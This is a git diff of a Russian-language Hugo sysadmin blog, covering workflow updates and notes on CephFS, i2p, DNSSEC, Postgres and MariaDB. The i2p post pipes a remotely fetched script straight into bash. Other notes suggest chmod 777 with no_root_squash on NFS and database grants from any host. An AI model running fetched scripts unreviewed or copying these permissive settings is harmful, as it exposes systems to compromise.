Update tor-website.md

Bump themes/themu from `74716e2` to `257284d`

.github/workflows/hugo.yml

@@ -1,10 +1,11 @@
 # Sample workflow for building and deploying a Hugo site to GitHub Pages
-name: Deploy Hugo site to Pages & Neocities
+name: Deploy Hugo site to Pages
 
 on:
   # Runs on pushes targeting the default branch
   push:
-    branches: ["main"]
+    branches:
+      - main
 
   # Allows you to run this workflow manually from the Actions tab
   workflow_dispatch:
@@ -31,7 +32,7 @@ jobs:
   build:
     runs-on: ubuntu-latest
     env:
-      HUGO_VERSION: 0.119.0
+      HUGO_VERSION: 0.141.0
     steps:
       - name: Install Hugo CLI
         run: |
@@ -40,26 +41,31 @@ jobs:
       - name: Install Dart Sass
         run: sudo snap install dart-sass
       - name: Checkout
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
         with:
           submodules: recursive
+          fetch-depth: 0
       - name: Setup Pages
         id: pages
-        uses: actions/configure-pages@v3
+        uses: actions/configure-pages@v5
       - name: Install Node.js dependencies
         run: "[[ -f package-lock.json || -f npm-shrinkwrap.json ]] && npm ci || true"
       - name: Build with Hugo
         env:
-          # For maximum backward compatibility with Hugo modules
+          HUGO_CACHEDIR: ${{ runner.temp }}/hugo_cache
           HUGO_ENVIRONMENT: production
-          HUGO_ENV: production
+          TZ: America/Los_Angeles
         run: |
           hugo \
+            --gc \
+            --minify \
             --baseURL "${{ steps.pages.outputs.base_url }}/"
       - name: Change color
-        run: sed -i 's/peachpuff/rebeccapurple/g' public/css/main.*.css 
+        run: sed -i 's/peachpuff/rebeccapurple/g' public/css/main.*.css
+      - name: Change URI
+        run: find public -type f -exec sed -i 's/\/\/fruw.org/\/\/fruworg.github.io/g' {} +
       - name: Upload artifact
-        uses: actions/upload-pages-artifact@v2
+        uses: actions/upload-pages-artifact@v3
         with:
           path: ./public
 
@@ -73,7 +79,7 @@ jobs:
     steps:
       - name: Deploy to GitHub Pages
         id: deployment
-        uses: actions/deploy-pages@v2
+        uses: actions/deploy-pages@v4
 
   deploy-neocities:
     environment:
@@ -82,7 +88,7 @@ jobs:
     needs: build
     steps:
     - uses: actions/checkout@v3
-    - uses: actions/download-artifact@v3
+    - uses: actions/download-artifact@v4
       with:
         path: .
     - name: Create directory
@@ -94,7 +100,9 @@ jobs:
     - name: Rename 404 page
       run: mv public/404.html public/not_found.html
     - name: Change color
-      run: sed -i 's/rebeccapurple/mediumseagreen/g' public/css/main.*.css 
+      run: sed -i 's/rebeccapurple/mediumseagreen/g' public/css/main.*.css
+    - name: Delete id_rsa.pub
+      run: rm public/id_rsa.pub
     - name: Deploy to Neocities
       uses: bcomnes/deploy-to-neocities@v1
       with:

.gitmodules

@@ -1,3 +1,3 @@
 [submodule "themes/themu"]
 	path = themes/themu
-	url = https://github.com/fruworg/themu
+	url = https://github.com/fruworg/themu.git

archetypes/default.md

@@ -3,4 +3,3 @@ title: "{{ replace .Name "-" " " | title }}"
 date: {{ .Date }}
 draft: true
 ---
-

config.toml

@@ -2,13 +2,13 @@ baseURL = "https://fruw.org/"
 languageCode = "ru-RU"
 languageName = "Russian"
 defaultContentLanguage = 'ru'
-title = "фруворг"
+title = "fruworg"
 theme = "themu"
 
 pygmentsstyle = "fruity"
 pygmentscodefences = true
 pygmentscodefencesguesssyntax = true
-paginate = 4
+pagination.pagerSize = 4
 
 [params]
 description = "всем привет!"
@@ -32,7 +32,7 @@ name = "pgp"
 url = "//keys.openpgp.org/pks/lookup?op=get&options=mr&search=im@fruw.org"
 
 [[params.social]]
-name = "keyoxide"
+name = "id"
 url = "//keyoxide.org/86a5f8191783e6f1"
 
 [[params.social]]
@@ -43,6 +43,14 @@ url = "//up.fruw.org"
 name = "git"
 url = "//github.com/fruworg"
 
+[[params.social]]
+name = "steam"
+url = "//steamcommunity.com/id/fruworg"
+
+[[params.social]]
+name = "x"
+url = "//x.com/fruworg"
+
 [[menu.main]]
 name = "посты"
 url = "/posts"
@@ -59,6 +67,16 @@ url = "/index.xml"
 weight = 3
 
 [[menu.main]]
-name = "webring"
+name = "dn42"
-url = "/webring.html"
+url = "https://f.dn42"
 weight = 4
+
+[[menu.main]]
+name = "i2p"
+url = "http://f.i2p"
+weight = 5
+
+[[menu.main]]
+name = "tor"
+url = "http://fruworgtuaajxcxdcygjybaeon7oid4ibkaugotfavucjs4i7zbrrnad.onion"
+weight = 6

content/posts/ald-pro.md

@@ -8,7 +8,7 @@ tags: [linux, astra, krb5]
 
 В файл `/etc/hosts` необходимо добавить ip и fqdn DC:
 
-```config
+```python
 <dc-ip> <dc-name>.<domain> <dc-name>
 ```
 
@@ -18,28 +18,32 @@ hostnamectl set-hostname <dc-name>.<domain>
 ```
 
 ## Добавление репозиториев ALD Pro
+
 В файл `/etc/apt/sources.list.d/aldpro.list` необходимо добавить репозиторий ALD Pro:
 
-```config
+```python
 deb https://download.astralinux.ru/aldpro/stable/repository-main/ 1.0.0 main
 deb https://download.astralinux.ru/aldpro/stable/repository-extended/ generic main
 ```
 
 ## Выставление приоритета репозиториев
+
 В файле `/etc/apt/preferences.d/aldpro` необходимо выставить приоритет репозиториев:
 
-```config
+```python
 Package: *
 Pin: release n=generic
 Pin-Priority: 900
 ```
 
 ## Установка пакета
+
 ```shell
 DEBIAN_FRONTEND=noninteractive apt-get install -q -y aldpro-mp
 ```
 
 ## Развёртывание 
+
 После того, как команда развёртывания отработает и сервер перезагрузитcя, 
 сервер ALD Pro будет доступен по адресу: `https://<dc-name>.<domain>`
 

content/posts/astra-fly.md

@@ -5,12 +5,12 @@ description: Небольшая памятка
 tags: [linux, astra]
 ---
 ## Установка пакета fly
-```bash
+```shell
 apt install fly-all-main
 ```
 
 ## Загрузка ОС с GUI по-умолчанию
-```bash
+```shell
 systemctl set-default graphical.target
 ```
 
@@ -22,6 +22,6 @@ systemctl get-default
 ```
 
 ### Вернуть загрузку ОС с CLI
-```bash
+```shell
 systemctl set-default multi-user.target
 ```

content/posts/astra-freeipa.md

@@ -9,7 +9,7 @@ tags: [linux, astra, krb5, freeipa]
 ### Создания сетевой видимости
 На клиенте и DC необходимо в файл `/etc/hosts` добавить оба ip и fqdn:
 
-```config
+```python
 <server-ip> <server-name>.<domain> <server-name>
 <client-ip> <client-name>.<domain> <client-name>
 ```

content/posts/autohotkey.md

@@ -0,0 +1,46 @@
+---
+title: Полезные бинды клавиш в Windows
+description: AutoHotkey v2
+date: 2025-01-14T11:36:00+01:00
+tags: [windows]
+---
+
+## Вступление
+Для бинда клавиш я использую [AutoHotkey](https://www.autohotkey.com/download/ahk-v2.exe). Для автозапуска нужно перенести `.ahk` файлы в `shell:startup`.
+	
+## CapLang.ahk
+Смена раскладки по нажатию на `CapsLock`. Сам `CapsLock` переключается через `Shift+CapsLock`.
+
+```python
+SendMode("Input")
+SetWorkingDir A_ScriptDir
++CapsLock::SetCapsLockState !GetKeyState("CapsLock", "T")
+CapsLock::Send "{Alt Down}{Shift Down}{Shift Up}{Alt Up}"
+```
+
+## Kitty.ahk
+Запуск Kitty по нажатию на кнопку `Copilot`.
+
+```python
+SendMode("Input")
+SetWorkingDir A_ScriptDir
++#f23:: Run "C:\Program Files\Kitty\kitty.exe -load <your-profile-name>"
+```
+
+## WSL.ahk
+Запуск WSL по нажатию на `Ctrl+Alt+T`
+
+```python
+SendMode("Input")
+SetWorkingDir A_ScriptDir
+<^<!t::Run 'powershell.exe -noexit -command "cd <wsl-home-dir>; wsl"'
+```
+
+## PrintScreen.ahk
+Скриншот нажатием на правый альт.
+
+```python
+SendMode("Input")
+SetWorkingDir A_ScriptDir
+RAlt::PrintScreen
+```

content/posts/bareos-install.md

@@ -37,7 +37,7 @@ exit
 ### Бэкап определённой папки
 В файл `/etc/bareos/bareos-dir.d/fileset/<name>.conf` необходимо добавить настройку бэкапа определённой папки:
 
-```config
+```python
 FileSet {
   Name = "<name>"
   Description = "<description>"

content/posts/cephfs.md

@@ -0,0 +1,68 @@
+---
+title: Создание CephFS
+description: Конфигурация и автомонтирование
+date: 2025-05-30T15:35:00+02:00
+tags: [linux, ceph]
+---
+## Создание FS / Сервер
+
+### Создание пула данных и меты
+
+```bash
+ceph osd pool create <fs-name>_data
+ceph osd pool create <fs-name>_meta
+ceph osd pool set <fs-name>_data bulk true
+```
+
+### Создание FS
+
+```bash
+ceph fs new <fs-name> <fs-name>_meta <fs-name>_data
+```
+
+### Создание пользователя
+
+`r` - чтение\
+`w` - запсись\
+`s` - снапшоты\
+`p` - аттрибуты
+
+```bash
+ceph fs authorize <fs-name> client.<user> / rwsp
+```
+
+## Подключение FS / Клиент
+
+### Установка необходимых пакетов
+
+```shell
+apt install ceph-common attr
+```
+
+### Создание директории для монтирования FS
+
+```bash
+mkdir /mnt/cephfs-<fs-name>
+```
+
+### Конфиг файлы
+
+Файл `/etc/ceph/ceph.conf` необходимо скопировать с сервера на клиент.\
+В файл  `/etc/ceph/ceph.client.<user>.keyring` необходимо вставить вывод команды создания клиента.\
+В файл `/etc/fstab` необходимо вставить следующее:
+
+```python
+<ceph-cluster.doma.in>:6789:/	 /mnt/cephfs-<fs-name>	ceph	name=<user>,fs=<fs-name>,noatime,_netdev
+```
+
+### Монтирование
+
+```shell
+mount -a
+```
+
+### Указание размера директории
+
+```shell
+setfattr -n ceph.quota.max_bytes -v <size-in-gb>G /mnt/cephfs-<fs-name>
+```

content/posts/cifs-automount.md

@@ -12,7 +12,7 @@ apt install cifs-utils -y
 ## Создание файла с данными УЗ 
 В файл `/root/.smbuser` необходимо добавить данные УЗ для подключения к шаре:
 
-```config
+```python
 username=<username>
 password=<password>
 domain=<domain>
@@ -25,7 +25,7 @@ sudo chmod 0400 /root/.smbuser
 
 ## Развёртывание 
 В `/etc/fstab` необходимо добавить строку подключения к шаре:
-```config
+```python
 //<address> /<folder> cifs credentials=/root/.smbuser,uid=<uid>,gid=<gid> 0 0
 ```
 

content/posts/dhcp-resolv.md

@@ -8,7 +8,7 @@ tags: [linux]
 Неприятно, когда конфиг не даёт поменять себя ручками, да?
 В `/etc/dhcp/dhclient.conf` необходимо добавить строки перезаписи:
 
-```config
+```python
 supersede domain-name-servers <dns-1>, <dns-n>;
 supersede domain-name "<domain.local>";
 ```

content/posts/dnssec-coredns.md

@@ -0,0 +1,36 @@
+---
+title: Конфигурация DNSSEC
+description: CoreDNS
+date: 2025-06-25T13:36:00+02:00
+tags: [linux, coredns]
+---
+## Генерация ключа
+
+```bash
+dnssec-keygen -a ECDSAP256SHA256 <doma.in>
+```
+
+## Конфигурация CoreDNS
+
+В `Corefile` доменной зоны необходимо вставить следующее:
+
+```python
+	dnssec {
+		key file /etc/coredns/dnssec/<filename-without-extension>
+	}
+```
+
+И перезапустить `CoreDNS` командой:
+
+```shell
+systemctl restart coredns
+```
+
+## DS-запись
+
+Далее необходимо добавить `DS-запись` в консоль регистратора.\
+Запись можно получить выполнив следующую команду:
+
+```bash
+dnssec-dsfromkey <filename-without-extension>
+```

content/posts/envip.md

@@ -14,7 +14,7 @@ tags: [linux, caddy]
 ### Caddy
 
 В Caddyfile необходимо добавить секцию с поддоменом для обновления whitelist (необходимо заменить [строку basic auth](//caddyserver.com/docs/caddyfile/directives/basicauth)):
-```config
+```python
 wh.<your.domain> {
         @block {
                 not client_ip {$WHITE_LIST}
@@ -32,7 +32,7 @@ wh.<your.domain> {
 ```
 
 Пример поддомена, доступ до которого разрешён только с IP из whitelist:
-```config
+```python
 sub.<your.domain> {
         @block {
                 not client_ip {$WHITE_LIST}
@@ -45,7 +45,7 @@ sub.<your.domain> {
 ```
 
 В `caddy.service` необходимо добавить следующую строку в секцию `[Service]`:
-```config
+```python
 Environment="WHITE_LIST=127.0.0.1/8"
 ```
 

content/posts/home-en-folders.md

@@ -6,6 +6,7 @@ tags: [linux]
 ---
 
 ## Смена имени
+
 Команда создаст папки на английском языке и сделает их стандартными. Папки с названиями на русском языке можно удалить.
 ```bash
 LANG=C xdg-user-dirs-update --force

content/posts/i2p-website.md

@@ -0,0 +1,71 @@
+---
+title: Поднятие сайта в i2p
+description: Caddy + i2pd
+date: 2025-06-25T14:10:00+02:00
+tags: [linux, i2p, caddy]
+---
+## Установка i2pd
+
+```shell
+apt -y install -y apt-transport-https
+wget -qO - https://repo.i2pd.xyz/.help/add_repo | bash -s -
+apt update
+apt -y install i2pd
+```
+
+## Конфигурация i2pd
+
+В `/etc/i2pd/tunnels.conf.d/website.conf` необходимо добавить следующее:
+
+```python
+[website]
+type = http
+host = 127.0.0.1
+port = 80
+keys = website.dat
+```
+
+И перезагрузите i2pd:
+
+```shell
+systemctl restart i2pd
+```
+
+## Регистрация адреса
+
+В `reg.i2p` необходимо проверить незанятость желаемого `fqdn`.\
+Если `fqdn` занят, но не используется, то его тоже можно занять.\
+Для регистрации необходимо сгенерировать подпись:
+
+```shell
+git clone --recursive https://github.com/purplei2p/i2pd-tools
+cd i2pd-tools
+./dependencies.sh
+make
+```
+
+```shell
+./regaddr /var/lib/i2pd/website.dat <domain>.i2p
+```
+
+Полученный вывод необходимо вписать в страницу желаемого домена на `reg.i2p`.
+
+## Конфигурация Caddy
+
+Полный `b32` домен можно посмотреть командой:
+
+```shell
+ls /var/lib/i2pd/destinations
+```
+
+В `Caddyfile` необходимо добавить следующее:
+
+```python
+http://<domain>.i2p {
+	respond "i2p"
+}
+
+http://<b32-domain-before-dots>.b32.i2p {
+	redir http://<domain>.i2p{uri}
+}
+```

content/posts/ip-command.md

@@ -4,25 +4,30 @@ date: 2022-11-25T19:17:00+05:00
 description: Команда ip в Linux
 tags: [linux]
 ---
+
 ## Показать все интерфейсы
-```shell
+
+```bash
 ip a
 ip l
 ```
 
 ## Показать информацию по конкретному интерфейсу
-```shell
+
+```bash
 ip a show <interface>
 ip l show <interface>
 ```
 
 ## Изменить статус сетевого интерфейса
+
 ```shell
 ip l set <interface> down
 ip l set <interface> up
 ```
 
 ## Добавить или удалить адрес
+
 ```shell
 ip a add <ip-address/mask> dev <interface>
 ip a add brd <ip-address/mask> dev <interface>

content/posts/linux-disk-resize.md

@@ -0,0 +1,29 @@
+---
+title: Ресайз диска
+description: ext4
+date: 2024-12-10T13:57:00+01:00
+tags: [linux]
+---
+## Расширение раздела
+
+`<disk>` - sda \
+`<partition>` - 1
+
+```shell
+growpart /dev/<disk> <partition>
+```
+
+## Увеличение ФС
+
+`<partition>` - sda1
+
+```shell
+resize2fs /dev/<partition>
+```
+## Очистка логов
+
+Если совсем нет места для выполнения команд
+
+```shell
+journalctl --vacuum-time=1d
+```

content/posts/linux-krb5.md

@@ -7,6 +7,7 @@ tags: [linux, krb5]
 ## Конфигурация сервера
 
 ### Установка пакетов
+
 ```shell
 apt -y install krb5-kdc krb5-admin-server
 ```
@@ -14,28 +15,33 @@ apt -y install krb5-kdc krb5-admin-server
 ## Конфигурация клиента
 
 ### Установка пакетов
+
 ```shell
 apt -y install krb5-user libpam-krb5
 ```
 
 ## Общая конфигурация
+
 На сервере и клиенте надо проделать следующие шаги:
 
 ### Смена hostname
+
 ```shell
 hostnamectl set-hostname <hostname>
 ```
 
 ### Правка файла hosts
+
 Вместо правки файла `/etc/hosts` можно поднять DNS-сервер и сделать записи там.
-```config
+```python
 <server-ip> <server-name.domain.name> <server-name>
 <client-ip> <client-name.domain.name> <client-name>
 ```
 
 ### Редактирование конфига Kerberos
+
 В `/etc/krb5.conf` необходимо добавить данные а реалме и kdc:
-```config
+```python
 [libdefaults]
         default_realm = <DOMAIN.NAME>
 
@@ -55,11 +61,13 @@ hostnamectl set-hostname <hostname>
 ## Создание нового реалма (на сервере)
 
 ### Создание master key для БД krb5
+
 ```shell
 krb5_newrealm
 ```
 
 ### Создание учётной записи администратора
+
 ```shell
 kadmin.local
 addprinc <admin-name>/admin
@@ -69,7 +77,7 @@ quit
 ### Разрешение административных прав 
 Добавляем администратора в `/etc/krb5kdc/kadm5.acl`:
 
-```config
+```python
 <admin-name>/admin
 ```
 

content/posts/linux-network.md

@@ -13,6 +13,7 @@ nameserver <dns-server>
 ```
 
 ## Статика
+
 В файл `/etc/network/interfaces.d/<interface>` необходимо добавить следующие строки:
 
 ```shell
@@ -24,6 +25,7 @@ iface <interface> inet static
 ```
 
 ## DHCP
+
 В файл `/etc/network/interfaces.d/<interface>` необходимо добавить следующие строки:
 
 ```shell

content/posts/linux-nfs.md

@@ -7,36 +7,42 @@ tags: [linux, nfs]
 ## Настройка NFS-сервера
 
 ### Установка пакета
+
 ```shell
 apt -y install nfs-kernel-server
 ```
 
 ### Создание каталога, который будет расшарен
+
 ```shell
 mkdir /nfs
 chmod 777 /nfs
 ```
 
 ### Разрешение сетевого доступа
+
 В файл `/etc/exports` необходимо добавить следующую строку:
 
-```config
+```python
 /nfs 	<client-ip>(rw,sync,no_root_squash,no_subtree_check)
 ```
 
 ## Настройка NFS-клиента
 
 ### Установка пакета
+
 ```shell
 apt -y install nfs-common
 ```
 
 ### Запуск службы
+
 ``` shell
 systemctl enable --now rpcbind
 ```
 
 ### Автомонитрование
+
 В файл `/etc/fstab` необходимо добавить следующую строку:
 
 ```shell

content/posts/linux-packages-rebuild.md

@@ -7,16 +7,19 @@ tags: [linux]
 ## Распаковка пакета
 
 ### Распаковка данных
+
 ```shell
 dpkg -x "<package>.deb" <folder>
 ```
 
 ### Распаковка метаданных
+
 ```shell
 dpkg -e "<package>.deb" <folder>/DEBIAN
 ```
 
 ## Сборка пакета
+
 ```shell
 dpkg -b <folder> "<package>.deb"
 ```

content/posts/lvm-base-commands.md

@@ -4,12 +4,15 @@ description: Базовые команды
 date: 2022-11-25T13:58:10+05:00
 tags: [linux, lvm]
 ---
+
 ## Установка пакекта
+
 ```shell
 apt -y install lvm2
 ```
 
 ## Создание
+
 ``` shell
 pvcreate /dev/sda
 vgcreate vg-name /dev/sda
@@ -17,6 +20,7 @@ lvcreate -L 10G -n lv-name vg-name
 ```
 
 ## Изменение
+
 ```shell
 vgextend vg /dev/sdb
 lvresize -rL +1G /dev/vg-name/lv-name
@@ -24,6 +28,7 @@ lvresize -rl +100%FREE /dev/vg-name/lv-name
 ```
 
 ## Просмотр
+
 ```shell
 pvs
 vgs

content/posts/mariadb-installation.md

@@ -0,0 +1,26 @@
+---
+title: Установка и конфигурация MariaDB
+description: На debian-based дистрибутивы
+date: 2024-01-26T16:30:00+06:00
+tags: [linux, mysql]
+---
+
+## Установка MariaDB
+```shell
+apt install mariadb-server
+```
+
+## Security конфигурация
+```shell
+mysql_secure_installation
+```
+
+## Создание БД и пользователя
+Для того, чтобы можно было подключиться удалённо, необходимо заменить `localhost` на `*`.
+```mysql
+mysql
+create database <database>;
+grant all privileges on <database>.* TO '<username>'@'localhost' identified by '<password>';
+flush privileges;
+exit
+```

content/posts/montenegro-dn.md

@@ -0,0 +1,32 @@
+---
+title: Виза цифрового кочевника Черногории
+description: Општина Бар
+date: 2024-07-31T09:50:00+02:00
+tags: [digital nomad]
+---
+## Введение
+
+В первый день приезда надо оплатить туристический налог в [туристичке](https://maps.app.goo.gl/D1nwbWVTNkySauZR6),
+купить местные симки в [mtel](https://maps.app.goo.gl/MsnfLeB6FtW3CBr99) или [tcom](https://maps.app.goo.gl/i1CjHNiAa3kqbbhm8).
+Все документы должны быть оригиналами с мокрой печатью. Документы из РФ апостилирования не требуют. Иноязычные документы должны быть с переводом судебного переводчика,
+я рекомендую [Майю Джонович](https://wa.me/38268521593) (доставляет курьером из Подгорицы, переводит с английского и русского).
+Подача документов происходит в [МУП'е](https://maps.app.goo.gl/cmf2YCaiJ9vyjHrT7) - туда нельзя в шлёпках, шортах и майке. Документы для подачи действительны 6 месяцев.
+
+## Документы
+
+1. Скан первой страницы паспорта;
+2. Справка о несудимости (из МВД/Консульства страны гражданства);
+3. Нотариальный договор аренды квартиры на 2 года;
+4. Лист непокретности;
+5. Квитки из туристички и об оплате пошлины (60+5+2). Пошлину платить на почте в здании МУП'а;
+6. Местная медицинская страхова на 2 года (например, [Sava](https://maps.app.goo.gl/PcMrE9E3oDLkPqxj9));
+7. Контракт с указанием места работы Бар, Черногория и сроком 2+ года (допники не принимают!);
+8. Выписка о существовании компании. В России - это выписка из ЕГРЮЛ (без апостиля), а на Кипре - Сertificate of incorporation (с апостилем);
+9. Выписка из банка об остатке на счёте в эквиваленте в евро (нужно больше 16200 евро);
+10. Справка с работы, где указаны место работы Черногория, Бар, паспортные данные, должность, срок окончания контракта (2+ года) и выплаты зарплаты по месяцам. 
+
+## Очереди
+По поводу очередей: в первый раз я управился с пошлинами на почте и очередью в самом МУП'е за ~30 минут, во второй раз это заняло более 3 часов.
+
+## Важно
+Информация актуальна на 31 июля 2024 года и для города Бар. В других општинах немного другие требования - вы можете посмотреть кейсы [здесь](https://t.me/DN_Montenegro). 

content/posts/pfx-to-pem.md

@@ -6,24 +6,24 @@ tags: [linux, tls]
 ---
 ## Извлечение сертификата и ключа
 
-```shell
+```bash
 openssl pkcs12 -in <tls>.pfx -out <tls>.pem -nodes
 ```
 
 ## Извлечение сертификата
 
-```shell
+```bash
 openssl pkcs12 -in <tls>.pfx -clcerts -nokeys -out <cert>.pem
 ```
 
 ## Извлечение ключа
 
-```shell
+```bash
 openssl pkcs12 -in <tls>.pfx -nocerts -out <key>.tmp.key
 ```
 
 ## Обеспароливание ключа
 
-```shell
+```bash
 openssl rsa -in <key>.tmp.key -out <key>.key
 ```

content/posts/pgp-commands.md

@@ -0,0 +1,28 @@
+---
+title: Памятка по PGP/GPG
+description: gnupg - export, import and renew
+date: 2025-01-12T22:00:00+01:00
+tags: [linux, pgp]
+---
+## Экспорт
+
+```bash
+gpg -a --export-secret-keys > private.asc
+gpg --export-ownertrust > trust.txt
+```
+
+## Импорт
+
+```bash
+gpg --import private.asc
+gpg --import public.asc
+gpg --import-ownertrust trust.txt
+```
+
+## Продление
+
+```bash
+gpg --list-keys
+gpg --quick-set-expire <fingerprint> 1y '*'
+gpg --export <your@ema.il> | curl -T - https://keys.openpgp.org
+```

content/posts/postgres-drop-db.md

@@ -5,30 +5,32 @@ date: 2023-03-03T13:26:00+05:00
 tags: [linux, postgres]
 ---
 ## На старой версии (<=12)
+
 Заходим в консоль Postgres:
-```shell
+```bash
 psql
 ```
 
 Убиваем соединения с БД:
-```psql
+```sql
 SELECT	pg_terminate_backend (pid)
 FROM	pg_stat_activity
 WHERE	pg_stat_activity.datname = '<database_name>';
 ```
 
 Дропаем БД:
-```shell
+```sql
 DROP DATABASE <database_name>;
 ```
 
 ## На новой версии (>=13)
+
 Заходим в консоль Postgres:
-```shell
+```bash
 psql
 ```
 
 Дропаем БД:
-```psql
+```sql
 DROP DATABASE <database_name> WITH (FORCE);
 ```

content/posts/postgres-krb5.md

@@ -47,7 +47,7 @@ q
 ### Изменение конфигруационного файла Postgres Pro
 В файл `/var/lib/pgpro/std-*/data/postgresql.conf` необходимо добавить следующие строки:
 
-```config
+```python
 krb_server_keyfile = 'postgres.keytab'
 listen_addresses = 'localhost, <pg-ip>'
 ```
@@ -55,7 +55,7 @@ listen_addresses = 'localhost, <pg-ip>'
 ### Разрешение подключения 
 В файл `/var/lib/pgpro/std-*/data/pg_hba.conf` необходимо добавить следующие строки:
 
-```config
+```python
 hostgssenc all        postgres	 localhost/32   gss include_realm=0
 hostgssenc <database> <username> <client-ip>/32 gss include_realm=0
 ```

content/posts/postgres-ldaps.md

@@ -10,42 +10,47 @@ AD необходимо дать роль CA и выпустить сертиф
 ## Перенос сертификата
 Необходимо перенести выпущенный конечный сертификат на сервер СУБД и перекодировать следующей командой:
 
-```shell
+```bash
 openssl x509 -inform der -in <ad>.cer -out <ad>.pem
 ```
 
 ## Установка пакета ldap-utils
+
 ```shell
 apt install ldap-utils -y
 ```
 
 ## Правка ldap конфига
+
 В файл `/etc/ldap/ldap.conf` необходимо добавить следующие строки:
 
-```config
+```python
 TLS_CACERT	/etc/ldap/<ad>.pem
 BASE		dc=<domain>,dc=<local>
 URI 		ldaps://<dc>.<domain>.<local>:636
 ```
 
 ## Проверка ldap
-```shell
+
+```bash
 ldapsearch -x -b "dc=<domain>,dc=<local>" -H ldaps://<dc>.<domain>.<local>:636 -W -D <domain-user>
 ```
 
 ## Правка pg_hba.conf
+
 С ldapprefix/ldapsuffix в файле `/var/lib/pgpro/std-14/data/pg_hba.conf`, возможно, придётся поколдовать. Стоит попробовать их оставить пустыми (="").
-```config
+```python
 host <database> <user> <ip>/<mask> ldap ldapserver=<dc>.<domain>.<local> ldapscheme=ldaps ldapprefix="cn=" ldapsuffix=",cn=users,dc=<domain>,dc=<local>"
 ```
 
 ## Создание пользователя в Postgres
-```shell
+
+```bash
 psql -c "CREATE USER <domain-user>;"
 ```
 
 ## Перезапуск Postgres Pro
+
 ```shell
 systemctl restart postgres*
 ```
-

content/posts/postgres-pro-astra-se.md

@@ -5,6 +5,7 @@ date: 2022-11-25T16:20:00+05:00
 tags: [linux, astra, postgres]
 ---
 ## Добавление репозитория
+
 ``` shell
 apt -y install gnupg
 wget -O - http://repo.postgrespro.ru/keys/GPG-KEY-POSTGRESPRO | apt-key add -
@@ -12,23 +13,27 @@ echo "deb http://repo.postgrespro.ru/pgpro-14/astra-smolensk/1.7 1.7_x86-64 main
 ```
 
 ## Установка пакета
+
 ```shell
 apt update
 apt -y install postgrespro-std-14
 ```
 
 ## systemd
+
 ```shell
 /opt/pgpro/std-14/bin/pg-setup service enable --now
 ln -s /lib/systemd/system/postgrespro-std-14.service /etc/systemd/system/postgresql.service
 ```
 
 ## Обновление путей
+
 ```shell
 /opt/pgpro/std-14/bin/pg-wrapper links update
 ```
 
 ## Смена пароля postgres
+
 ```shell
 su - postgres
 psql -c "ALTER USER postgres PASSWORD '<password>';"

content/posts/postgres-replication.md

@@ -4,6 +4,7 @@ description: Потоковая репликация и репликация с
 date: 2022-11-25T16:51:00+05:00
 tags: [linux, postgres, nfs]
 ---
+
 ## Установка Postgres Pro
 Процесс установки описан в [этом посте](/posts/postgres-pro-astra-se).
 
@@ -11,27 +12,27 @@ tags: [linux, postgres, nfs]
 Про различия в реализациях репликаций можно почитать вот [здесь](//edu.postgrespro.ru/dba3/dba3_04_replica_physical.pdf).
 
 ### Конфигурация master
-Действия с Postgres Pro следует выполнять от имени пользователя postgres.
-```shell
-su - postgres
-```
 
 #### Создание пользователя для репликации
-```shell
+
+```bash
+su - postgres
 psql -c "CREATE ROLE repuser WITH REPLICATION LOGIN ENCRYPTED PASSWORD '<password>';"
 ```
 
 #### Разрешение подключения для slave
+
 Дописываем в конец файла `/var/lib/pgpro/std-*/data/pg_hba.conf`:
 
-```config
+```python
 host    replication    repuser    <slave-ip>/32    md5
 ```
 
 #### Реконфигурация 
-В файл `/var/lib/pgpro/std-13/data/postgresql.conf` необходимо добавить следующие строки:
 
-```config
+В файл `/var/lib/pgpro/std-*/data/postgresql.conf` необходимо добавить следующие строки:
+
+```python
 listen_addresses = 'localhost, <master-ip>'
 wal_level = hot_standby
 archive_mode = on
@@ -54,26 +55,30 @@ pg_basebackup -P -R -X stream -c fast -h <master-ip> -U postgres -D /var/lib/pgp
 ```
 
 ## Репликация с архивом
+
 Настройка репликации с архивом выролняется с некоторыми отличиями от потоковой репликации:
 
 ### Развёртывание NFS
+
 WAL-архивы будут складываться на NFS. Как сконфигурировать NFS написано [здесь](/posts/linux-nfs).
 Необходимо смонтировать NFS на master и slave в одинаковые директории.
 
 ### Дополнение к реконфигурации 
+
 В файл `/var/lib/pgpro/std-*/data/postgresql.conf` необходимо добавить следующие строки:
 
-```config
+```python
 archive_command = 'test ! -f /nfs/%f && cp %p /nfs/%f'
 archive_cleanup_command = 'pg_archivecleanup -d /nfs %r 2>>cleanup.log'
 ```
 
 ## Синхронный и асинхронный режим репликации
+
 При синхронной репликации, изменения применятся на основном сервере только после того, как они запишутся в WAL хотя бы одной реплики, а при асинхронной - сразу. 
 По умолчанию репликация работает в асинхронном режиме. 
 Для того, чтобы она работала в синхронном режиме, необходимо изменить две строки в конфигурационном файле Postgres Pro `/var/lib/pgpro/std-*/data/postgresql.conf`:
 
-```config
+```python
 synchronous_commit = on
 synchronous_standby_names = 'pgsql_0_node_0'
 ```

content/posts/postgres-simple-backup.md

@@ -5,8 +5,9 @@ date: 2022-12-14T16:48:00+05:00
 tags: [linux, postgres]
 ---
 ## Скрипт для бэкапа БД и глобальных объектов
+
 В файл `/home/<username>/pg-backup.sh` необходимо добавить следующие строки:
-```config
+```python
 #!/usr/bin/env bash
 
 pg_dump -U <username> -h <pg-hostname> -Fc <db> --file=<db>-$(date '+%Y-%m-%d').dump
@@ -14,13 +15,15 @@ pg_dumpall -U <username> -h <pg-hostname> --globals --file=gb-$(date '+%Y-%m-%d'
 ```
 
 ## Файл cron с запуском скрипта (каждый день в 2:00)
+
 Необходимо дописать в конец `crontab -e -u <username>` следующие строки:
-```config
+```python
 0 2 * * * /usr/bin/env bash /home/<username>/pg-backup.sh
 ```
 
 ## Рестор файлов БД и глобальных объектов
-```shell
+
+```bash
 pg_restore -C -d postgres <dbname>-<date>.dump
 psql -U postgres < gb-<date>.dump
 ```

content/posts/postgres-tls.md

@@ -5,15 +5,17 @@ date: 2022-11-28T20:25:00+05:00
 tags: [linux, postgres, tls]
 ---
 ## Создание сертификата
+
 В этом посте я буду использовать самоподписанный сертификат, но сертификат от Let's Encrypt тоже подойдёт.
 Сертификат и ключ желательно держать в той же папке, где лежат конфиги Postgres Pro.
-```shell
+```bash
-openssl req -x509 -newkey rsa:4096 -keyout <key>.pem -out <cert>.pem -sha256 -days 365
+openssl req -x509 -newkey rsa:4096 -nodes -keyout <key>.key -out <cert>.pem -sha256 -days 365
 ```
 
 ## Включение TLS
+
 В файл `/var/lib/pgpro/std-*/data/postgresql.conf` необходимо добавить следующие строки:
-```config
+```python
 ssl = on
